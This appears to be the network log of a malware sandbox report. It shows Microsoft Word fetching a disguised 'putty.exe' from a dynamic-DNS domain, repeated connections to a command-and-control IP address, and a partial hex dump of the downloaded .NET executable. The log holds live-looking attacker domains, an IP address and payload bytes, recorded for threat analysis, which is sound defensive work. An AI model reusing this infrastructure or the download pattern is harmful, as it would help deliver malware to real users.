                                Aug 2, 2021 11:01:42.028832912 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.029752970 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.123837948 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.124032974 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.152980089 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.153913975 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.183955908 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.185450077 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.216012001 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.217521906 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.416759014 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.419496059 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.525273085 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.527242899 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.655190945 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:42.655597925 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:42.822599888 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:46.732414007 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:47.025432110 CEST823449177203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:47.025645018 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:48.755485058 CEST491778234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:48.946436882 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:48.947966099 CEST491686703192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:49.121010065 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:52.842405081 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:52.871299982 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:52.871414900 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:52.872031927 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:52.925143957 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:52.925260067 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.025182962 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.025234938 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.055164099 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.057595968 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.212610006 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.212812901 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.278074026 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.279736042 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.324681044 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.348675966 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.491844893 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.491991997 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.524283886 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.524599075 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.557163000 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.557224035 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.590898991 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.590959072 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.728379011 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.728554964 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:53.916372061 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:53.919420958 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:54.025374889 CEST823449178203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:54.026926041 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:54.112660885 CEST491788234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.266596079 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.315360069 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.315531015 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.316930056 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.377887964 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.377952099 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.433166981 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.433259964 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.463366032 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.496572971 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.558504105 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.558624983 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.605283976 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.611542940 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.655250072 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.671451092 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.715612888 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.746573925 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.748172045 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.779210091 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.793143988 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.853698969 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.871200085 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.904303074 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.959255934 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.987638950 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.988085032 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.042356968 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.042848110 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.097708941 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.097910881 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.151364088 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.151614904 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.157438040 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.197288990 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.197460890 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.259622097 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.259804010 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.286906004 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.322577953 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.370440006 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.419071913 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.432636023 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.440684080 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.440763950 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.578025103 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.607223988 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:03.607315063 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.607657909 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.681041002 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:03.681252003 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.710711002 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:03.711329937 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.790767908 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:03.919810057 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:03.962214947 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:03.990858078 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:04.221678019 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:04.251709938 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:04.252593994 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:04.282233000 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:04.283467054 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:04.315053940 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:04.518862009 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:07.072068930 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:07.353625059 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:08.651300907 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:08.902151108 CEST491808234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:08.947962046 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:09.198595047 CEST491686703192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:11.852711916 CEST491686703192.168.2.22203.159.80.186
                                Aug 2, 2021 11:02:12.025379896 CEST670349168203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:13.688009024 CEST823449180203.159.80.186192.168.2.22
                                Aug 2, 2021 11:02:13.894656897 CEST491808234192.168.2.22203.159.80.186

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 2, 2021 10:59:54.123145103 CEST5219753192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:54.167108059 CEST53521978.8.8.8192.168.2.22
                                Aug 2, 2021 10:59:57.598957062 CEST5309953192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:57.642354965 CEST53530998.8.8.8192.168.2.22
                                Aug 2, 2021 10:59:58.563791037 CEST5283853192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:58.599704981 CEST53528388.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:28.612422943 CEST6120053192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:28.667654037 CEST53612008.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:29.524005890 CEST4954853192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:29.556768894 CEST53495488.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:29.557904005 CEST4954853192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:29.590831041 CEST53495488.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.130738020 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.262723923 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.263684988 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.298891068 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.299585104 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.334811926 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.769011974 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:03.900093079 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.945925951 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:03.978482962 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.992775917 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:04.025501013 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:10.201478958 CEST6186553192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:10.237142086 CEST53618658.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.511684895 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.549159050 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.592659950 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.629231930 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.686260939 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.724112988 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:26.042512894 CEST5249653192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:26.079297066 CEST53524968.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:26.163316965 CEST5249653192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:26.191297054 CEST53524968.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:31.131093025 CEST5756453192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:31.158580065 CEST53575648.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:36.336036921 CEST6300953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:36.371905088 CEST53630098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:41.617649078 CEST5931953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:41.650404930 CEST53593198.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:52.811868906 CEST5307053192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:52.841140032 CEST53530708.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:58.229518890 CEST5977053192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:58.264827013 CEST53597708.8.8.8192.168.2.22
                                Aug 2, 2021 11:02:03.448385954 CEST6152353192.168.2.228.8.8.8
                                Aug 2, 2021 11:02:03.577531099 CEST53615238.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 2, 2021 10:59:54.123145103 CEST192.168.2.228.8.8.80x6029Standard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:57.598957062 CEST192.168.2.228.8.8.80xe5d1Standard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:58.563791037 CEST192.168.2.228.8.8.80x5cccStandard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:28.612422943 CEST192.168.2.228.8.8.80xe21Standard query (0)sdafsdffssffs.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.524005890 CEST192.168.2.228.8.8.80xe89aStandard query (0)hutyrtit.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.557904005 CEST192.168.2.228.8.8.80xe89aStandard query (0)hutyrtit.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.130738020 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.263684988 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.299585104 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.769011974 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.945925951 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.992775917 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:10.201478958 CEST192.168.2.228.8.8.80x12ebStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.511684895 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.592659950 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.686260939 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.042512894 CEST192.168.2.228.8.8.80x5b8fStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.163316965 CEST192.168.2.228.8.8.80x5b8fStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:31.131093025 CEST192.168.2.228.8.8.80xb6e4Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:36.336036921 CEST192.168.2.228.8.8.80x7ae6Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:41.617649078 CEST192.168.2.228.8.8.80xe8bfStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:52.811868906 CEST192.168.2.228.8.8.80xd6d2Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:58.229518890 CEST192.168.2.228.8.8.80x4853Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:02:03.448385954 CEST192.168.2.228.8.8.80xf096Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 2, 2021 10:59:54.167108059 CEST8.8.8.8192.168.2.220x6029No error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:57.642354965 CEST8.8.8.8192.168.2.220xe5d1No error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:58.599704981 CEST8.8.8.8192.168.2.220x5cccNo error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:28.667654037 CEST8.8.8.8192.168.2.220xe21No error (0)sdafsdffssffs.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.556768894 CEST8.8.8.8192.168.2.220xe89aNo error (0)hutyrtit.ydns.eu203.159.80.165A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.590831041 CEST8.8.8.8192.168.2.220xe89aNo error (0)hutyrtit.ydns.eu203.159.80.165A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.262723923 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.298891068 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.334811926 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.900093079 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.978482962 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:04.025501013 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:10.237142086 CEST8.8.8.8192.168.2.220x12ebNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.549159050 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.629231930 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.724112988 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.079297066 CEST8.8.8.8192.168.2.220x5b8fNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.191297054 CEST8.8.8.8192.168.2.220x5b8fNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:31.158580065 CEST8.8.8.8192.168.2.220xb6e4No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:36.371905088 CEST8.8.8.8192.168.2.220x7ae6No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:41.650404930 CEST8.8.8.8192.168.2.220xe8bfNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:52.841140032 CEST8.8.8.8192.168.2.220xd6d2No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:58.264827013 CEST8.8.8.8192.168.2.220x4853No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:02:03.577531099 CEST8.8.8.8192.168.2.220xf096No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • newhosteeeee.ydns.eu
                                • hutyrtit.ydns.eu

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249165203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:54.220050097 CEST0OUTGET /putty.exe HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:54.251251936 CEST2INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:54 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
